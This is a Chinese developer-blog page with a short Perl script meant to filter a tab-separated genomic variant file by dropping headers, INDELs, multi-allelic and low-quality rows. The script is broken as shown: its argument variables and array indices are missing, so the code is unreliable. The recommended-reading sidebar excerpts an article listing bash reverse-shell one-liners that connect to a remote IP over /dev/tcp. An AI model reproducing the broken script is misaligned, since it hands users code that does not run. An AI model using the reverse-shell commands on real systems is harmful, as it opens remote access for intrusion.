Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
社区首页 >专栏 >提取信息

提取信息

作者头像
生信补给站
发布于 2020-08-06 02:28:01
发布于 2020-08-06 02:28:01
43400
代码可运行
举报
文章被收录于专栏:生信补给站生信补给站
运行总次数:0
代码可运行
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#!/usr/bin/perl -w



open IN,"ARGV[0]" or die $!;

open OUT,">ARGV[1]" or die $!;



while(<IN>){

    chomp;

	my @arr=split /\t/;

	if(($_=~/^#/)||($arr[]=~/^INDEL.*/)||($arr[] =~ /,/)||($arr[] < 20)){     ###提取信息	

		next;

       }

       else{

				print  OUT $_,"\n";

			}

	}			

close IN;

close OUT;

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2016-04-16,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 生信补给站 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
简单实例-对比文件
####比较两个文件 #!/usr/bin/perl use strict; use warnings; #use PerlIO::gzip; open IN1, "$ARGV[0]" or die $!;   ##打开文件1 open (IN2,"$ARGV[1]") or die $!;  ##打开文件2 open (OUT,">$ARGV[2]") or die $!; ##打开结果文件(此时为空) my %hash=(); my $ass; while(<IN1>){            ##按行
生信补给站
2020/08/06
5370
宏基因组流程: 从Raw fastq到taxonomic and functional profile
在宏基因组分析流程的开始阶段,首要任务是检查原始测序数据的质量。这一步包括对数据的完整性、文件格式、序列长度、测序质量(如Q值、GC含量等)以及潜在的测序错误或污染进行初步评估。通过这一步,研究人员可以确保后续分析的准确性和可靠性。
生信学习者
2024/06/14
3800
宏基因组流程: 从Raw fastq到taxonomic and functional profile
整理 Notion 导出文档名称
大概是这样,会讲过长的文档名称压缩,在首行使用 md 一级标签标记文件名,再将文档截断为图示的样子。
宋天伦
2023/10/21
2570
整理 Notion 导出文档名称
ncRNA分析
DNA、RNA 和蛋白质是三种重要的生物大分子,传统的观念认为 DNA 携带着遗传信息,蛋白质是体现生物功能的分子,而 RNA 在这二者间起传递遗传信息的桥梁作用。随着新一代测序技术的发展,越来越多的生物基因组被测序出来,而且,随着 RNAseq 技术的发展,我们对非编码 RNA 的认识也逐渐深入,甚至改变了一些我们传统的认识。人体每个细胞都具有相同的染色体,为什么最终会分化成不同的形态执行不同的功能呢?这些都是由于转录翻译的 RNA 的不同。
生信喵实验柴
2022/10/25
4240
利用perl一键生成符合LEFse差异分析的Table表
基于Picrust2进行宏基因预测后,我们往往需要对数据进行可视化话,其中LEFse就是非常不错的选择,这里通过perl实现对表的格式化。 LEFse –Galaxy平台:http://huttenhower.sph.harvard.edu/galaxy
全栈程序员站长
2022/09/07
3940
利用perl一键生成符合LEFse差异分析的Table表
Some Ways To Create An Interactive Shell On Linux
Bash $ bash -i >& /dev/tcp/192.168.68.206/2333 0>&1 $ exec 196<>/dev/tcp/192.168.68.206/2333; sh <&196 >&196 2>&196 $ exec 5<>/dev/tcp/192.168.68.206/2333 cat <&5 | while read line; do $line 2>&5 >&5;done $ exec 5<>/dev/tcp/192.168.68.206/2333 cat <&5 | wh
风流
2018/06/07
9080
原创哈希数据导出算法 原
#Oracle客户端配置 ORACLE_HOME=/export/home/tmn/oracle/product/11.2.0/dbhome NLS_LANG="SIMPLIFIED CHINESE_CHINA.ZHS16GBK" export ORACLE_HOME NLS_LANG PATH=$PATH:$ORACLE_HOME/bin export PATH LD_LIBRARY_PATH=/usr/lib64:/export/home/tmn/oracle/product/11.2.0/dbhom
用户2836074
2018/08/15
1.2K0
简单实例应用(1)
##提取文件中的某几列,并取负对数值(P) #!/usr/bin/perl use strict; use warnings; use Math::Complex; ##math function open IN, " open OUT, ">$ARGV[1]"; # output file my @line; my $P_value=0; while () { chomp; next if (/^NSNP/); ##匹配到就跳出循环 next i
生信补给站
2020/08/06
6910
perl语言十分钟入门【零基础可入】
零基础,perl语言,10分钟入门 1.Hello,World #!/usr/bin/perl -w print ("hello,world!\n"); #print "hello,world!\n"; 说明: (1)第一行指定解释器,-w参数表示提示警告(或者使用use strict命令,执行更严格的检查); (2)第二行输出hello, world!; (3)如果习惯c的函数方式,print的参数可以打括号; (4)第三行是注释,注释以#打头; (5)如果习惯shell的方式,print的参数可以没有括
架构师之路
2018/02/28
2.1K0
生信人写程序1. Perl语言模板及配置
生物信息领域常用语言 个人认为:是否能熟悉使用Shell(项目流程搭建)+R(数据统计与可视化)+Perl/Python/Java..(胶水语言,数据格式转换,软件间衔接)三门语言是一位合格生物信息工程师的标准。 生物信息常用语言非常广泛,我常用的有Perl, R, Shell,此外参与网页制作还用过PhP+mySQL,写博客用Markdown。这些其实都是非常小众的语言,如果和计算机专业的人交流,对方可能没听过这些语言。本系列“生信人写程序”主要以Perl为主,并伴随一些零星的R和Shell编程的经验和
生信宝典
2018/02/05
1.3K0
生信人写程序1. Perl语言模板及配置
(11)仿写bowtie-生信菜鸟团博客2周年精选文章集
然后仿写了bowtie,对我的编程技术提高非常有帮助。目录如下: 自己动手写bowtie第一讲:BWT算法详解并建立索引 自己动手写bowtie第二讲:优化索引 自己动手写bowtie第三讲:序列查询。 自己动手写bowtie第4讲:笨方法字符串搜索 Bowtie算法第五讲-index2tally Bowtie算法第六讲-tally法对bwt索引进行搜索 首先,什么是BWT,可以参考博客 http://www.cnblogs.com/xudong-bupt/p/3763814.html 他讲的非常好。 一个
生信技能树
2018/03/08
8860
(11)仿写bowtie-生信菜鸟团博客2周年精选文章集
Apache日志分割的3种方法
    rotatelogs是一个配合Apache管道日志功能使用的简单程序。举例:     CustomLog "|bin/rotatelogs /var/logs/logfile 86400" common     此配置会建立文件/var/logs/logfile.nnnn,其中的nnnn是名义上的日志启动时的系统时间 (此时间总是回卷时间的倍数,可以用于cron脚本的同步)。 在回卷时间到达时(在此例中是24小时以后),会产生一个新的日志。     CustomLog "|/opt/apache/bin/rotatelogs /opt/apache/logs/access_log.%d-%m-%y 800M" common     此配置会在日志文件大小增长到800兆字节时回卷该日志。  概要     rotatelogs logfile [ rotationtime [ offset ]] | [ filesizeM ]
py3study
2020/01/07
1.2K0
三种方法提取miRNA成熟体序列
前面我们讲过☞miRNA靶基因预测☜,我们知道miRNA靶基因预测一般是通过seed(种子序列)与靶基因序列互补配对来实现的。有很多本地版本的软件都是基于这个原理来预测miRNA靶基因的,例如☞targetscan☜,miRanda,RNAhybrid等等。这些软件都有本地版本,可以下载到自己的电脑上运行。一般输入都是两个文件,一个是miRNA的成熟体序列,因为miRNA的种子序列一般位于miRNA成熟体5‘的2-7位(参考☞miRNA靶基因预测☜),另外一个输入文件就是你要预测的靶基因序列了,这里的靶基因序列可以是mRNA 3’UTR序列,也可以是lncRNA或者circRNA序列。
生信交流平台
2022/09/21
1.2K0
三种方法提取miRNA成熟体序列
Perl语言入门系列之三:文件输入与输出
<>操作符俗称钻石操作符,它是行标准输入<STDIN>的特例,不是从键盘获得数据而是从用户指定的位置读取数据,这里的用户指定位置指运行程序时命令行程序后面紧跟的参数,也即命令行参数。
SYSU星空
2022/05/05
2.5K0
Perl语言入门系列之三:文件输入与输出
Perl语言程序应用(资料汇总版)
为了更加方便、快捷的实现某些功能,Perl拥有很多其他的控制结构,这些结构也许不是必需的,但可以使程序更加简洁和具有逻辑性。
SYSU星空
2022/05/05
3.6K0
Perl语言程序应用(资料汇总版)
来看个联发科秋招的一个大题(3)——必考的Perl语言文件读写
用 perl 脚本读入一个文件,将文件中所有内容变成一行输出到文件 out.txt 中。
FPGA探索者
2021/04/15
4780
来看个联发科秋招的一个大题(3)——必考的Perl语言文件读写
单细胞测序流程(单细胞rna测序)
咱们在上一个课程中进行了GO圈图绘画,但是我富集分析并不只是有GO,kegg通路的富集分析可以看到基因发挥的作用,在生物体中的重要性。
全栈程序员站长
2022/07/31
1.5K0
单细胞测序流程(单细胞rna测序)
《Perl语言入门》——读书笔记
Perl语言入门 /** * prism.js Github theme based on GitHub's theme. * @author Sam Clarke */ code[class*="language-"], pre[class*="language-"] { color: #333; background: none; font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace; text-align: left; white-space: pre; word-spacing: normal; word-break: normal; word-wrap: normal; line-height: 1.4; -moz-tab-size: 8; -o-tab-size: 8; tab-size: 8; -webkit-hyphens: none; -moz-hyphens: none; -ms-hyphens: none; hyphens: none; } /* Code blocks */ pre[class*="language-"] { padding: .8em; overflow: auto; /* border: 1px solid #ddd; */ border-radius: 3px; /* background: #fff; */ background: #f5f5f5; } /* Inline code */ :not(pre) > code[class*="language-"] { padding: .1em; border-radius: .3em; white-space: normal; background: #f5f5f5; } .token.comment, .token.blockquote { color: #969896; } .token.cdata { color: #183691; } .token.doctype, .token.punctuation, .token.variable, .token.macro.property { color: #333; } .token.operator, .token.important, .token.keyword, .token.rule, .token.builtin { color: #a71d5d; } .token.string, .token.url, .token.regex, .token.attr-value { color: #183691; } .token.property, .token.number, .token.boolean, .token.entity, .token.atrule, .token.constant, .token.symbol, .token.command, .token.code { color: #0086b3; } .token.tag, .token.selector, .token.prolog { color: #63a35c; } .token.function, .token.namespace, .token.pseudo-element, .token.class, .token.class-name, .token.pseudo-class, .token.id, .token.url-reference .token.variable, .token.attr-name { color: #795da3; } .token.entity { cursor: help; } .token.title, .token.title .token.punctuation { font-weight: bold; color: #1d3e81; } .token.list { color: #ed6a43; } .token.inserted { background-color: #eaffea; color: #55a532; } .token.deleted { background-color: #ffecec; color: #bd2c00; } .token.bold { font-weight: bold; } .token.italic { font-style: italic; } /* JSON */ .lan
Homqyy
2023/03/06
2.5K0
教你无限制批量下载JGI-IMG基因组数据!
IMG(Integrated Microbial Genomes,https://img.jgi.doe.gov/cgi-bin/m/main.cgi)由美国能源部联合基因组研究中心(Joint GenomeInstitute,JGI)于2005年创立,是综合的微生物基因组数据库及比较分析系统。IMG收录了细菌、古菌、质粒、病毒以及少量真核生物基因组数据,其数据主要来源于NCBI的RefSeq数据库,但是增添了更加详细的注释信息,例如CRISPR序列、信号肽、非编码RNA、功能基因等。IMG基于COG、Pfam、TIGRfam、InterPro、GO和KEGG等数据库产生基因家族的注释信息。其主页如下所示:
SYSU星空
2022/05/05
3K0
教你无限制批量下载JGI-IMG基因组数据!
perl dancer 基础8
在dancer中 TEST-APP/views/ 是控制显示的,创建 TEST-APP/views/check_class/check_database_backup.tt
franket
2022/03/25
8700
相关推荐
简单实例-对比文件
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验